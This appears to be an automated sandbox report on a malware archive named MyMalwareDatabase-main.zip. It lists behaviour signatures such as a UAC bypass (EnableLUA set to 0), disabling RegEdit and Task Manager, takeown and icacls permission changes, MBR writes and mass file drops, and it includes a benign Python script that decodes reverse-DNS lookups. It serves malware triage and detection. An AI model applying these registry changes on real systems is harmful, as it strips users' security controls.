Analysis Overview
SHA256
332596c3a5a92c4dfbdb3de366d9ab8601f87644c1b4ee7ca416507d859cf284
Threat Level: Known bad
The file MyMalwareDatabase-main.zip was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
UAC bypass
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Possible privilege escalation attempt
Modifies system executable filetype association
Loads dropped DLL
Executes dropped EXE
UPX packed file
Checks computer location settings
Modifies file permissions
Drops desktop.ini file(s)
Modifies WinLogon
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Unsigned PE
Program crash
Enumerates physical storage devices
NSIS installer
Modifies data under HKEY_USERS
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Modifies Control Panel
Modifies registry key
Kills process with taskkill
System policy modification
Modifies registry class
Modifies File Icons
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-03 13:15
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Losange.exe
"C:\Users\Admin\AppData\Local\Temp\Losange.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
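The Network table above contains only reverse (PTR) lookups sent to 8.8.8.8. The Python below is an added example, not part of the sandbox output: it decodes each in-addr.arpa name back to the IPv4 address being looked up, and tolerates the row whose Domain cell is empty. NETWORK_TABLE is copied from the table above. One caveat for triage: PTR lookups of public addresses in a Windows 10 sandbox image are routinely generated by the operating system's own background services, and this table does not attribute them to Losange.exe, so the decoded addresses are context for the analyst rather than C2 indicators.

```python
"""Decode the reverse-DNS (PTR) queries from a sandbox Network table.

Added example for this page; NETWORK_TABLE is copied from the behavioral14
run above, including the one row that has no Domain cell.
"""
import ipaddress
import re

# in-addr.arpa names carry the octets in reverse order, e.g.
# 241.154.82.20.in-addr.arpa is the PTR name for 20.82.154.241.
_PTR_RE = re.compile(
    r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?$", re.I)


def ptr_to_ip(name: str):
    """Return the IPv4 address a PTR name refers to, or None when the name
    is not a well-formed in-addr.arpa name (or an octet exceeds 255)."""
    m = _PTR_RE.match(name.strip())
    if not m:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(m.groups()))))
    except ipaddress.AddressValueError:
        return None


def parse_network_table(table: str) -> list:
    """Parse the report's pipe-delimited rows; the header is skipped and a
    row that lacks the Domain cell is kept with an empty domain."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or cells[0] == "Country":
            continue
        domain = cells[2] if len(cells) == 4 else ""
        rows.append({"country": cells[0], "dest": cells[1], "domain": domain,
                     "proto": cells[-1], "ip": ptr_to_ip(domain)})
    return rows


def decoded_addresses(rows):
    """Distinct decoded addresses in table order, plus the count of rows
    that could not be decoded."""
    ips, undecodable = [], 0
    for r in rows:
        if r["ip"] is None:
            undecodable += 1
        elif r["ip"] not in ips:
            ips.append(r["ip"])
    return ips, undecodable


# Copied from the behavioral14 Network table on this page.
NETWORK_TABLE = r"""
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
"""

if __name__ == "__main__":
    ips, bad = decoded_addresses(parse_network_table(NETWORK_TABLE))
    print("\n".join(ips), f"\n{bad} row(s) without a decodable domain")
```

Run the decoded list through your own enrichment (ASN, passive DNS) before drawing conclusions; the sandbox only tells you that the guest asked who owns these addresses.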
Files
memory/1400-0-0x00007FF798630000-0x00007FF798656000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
150s
Max time network
122s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
155s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | C:\Windows\system32\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7415).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2008).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(527).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3522).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3621).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4317).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9716).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(503).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7741).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9568).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6943).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1150).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2291).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(221).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1672).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6957).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7999).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8569).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1442).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6509).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3896).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3970).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4757).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7724).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9871).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3188).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7442).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9571).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(395).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4477).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1140).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4908).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(794).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1918).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2491).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5020).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6406).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7376).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8152).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8958).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(663).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4655).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3515).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4274).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4528).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6536).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7065).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1876).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3425).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4535).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7480).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8272).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1393).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6132).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4646).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6551).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1333).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1785).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
